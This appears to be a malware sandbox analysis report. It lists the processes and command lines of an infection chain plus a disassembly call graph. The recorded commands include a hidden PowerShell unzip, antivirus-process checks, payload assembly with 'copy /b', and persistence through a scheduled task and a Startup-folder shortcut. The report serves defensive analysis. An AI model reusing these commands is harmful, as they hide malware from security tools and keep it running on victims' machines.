                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:13:02
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:11
                                                                  Start time:12:13:11
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:13
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:msword.exe
                                                                  Imagebase:0x400000
                                                                  File size:1'328'655 bytes
                                                                  MD5 hash:5BF20E8953B3219CD4F60BE10A73509F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 8%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:12:13:13
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:12:13:14
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 10
                                                                  Imagebase:0x810000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:12:13:16
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:12:13:16
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:12:13:18
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xed0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:12:13:18
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:12:13:19
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xed0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:12:13:19
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md 361684
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:extrac32 /Y /E Approaches
                                                                  Imagebase:0x770000
                                                                  File size:29'184 bytes
                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:27
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /V "Korea" Measurement
                                                                  Imagebase:0x6b0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:29
                                                                  Start time:12:13:20
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:12:13:21
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Propose.com U
                                                                  Imagebase:0xc50000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:31
                                                                  Start time:12:13:21
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:choice /d y /t 5
                                                                  Imagebase:0xa80000
                                                                  File size:28'160 bytes
                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x8a0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:12:13:22
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:12:13:23
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff64f150000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:12:13:24
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0xc70000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:12:13:34
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff64f150000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:12:13:34
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0xc70000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:18.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.7%
                                                                    Total number of Nodes:1525
                                                                    Total number of Limit Nodes:33
                                                                    execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 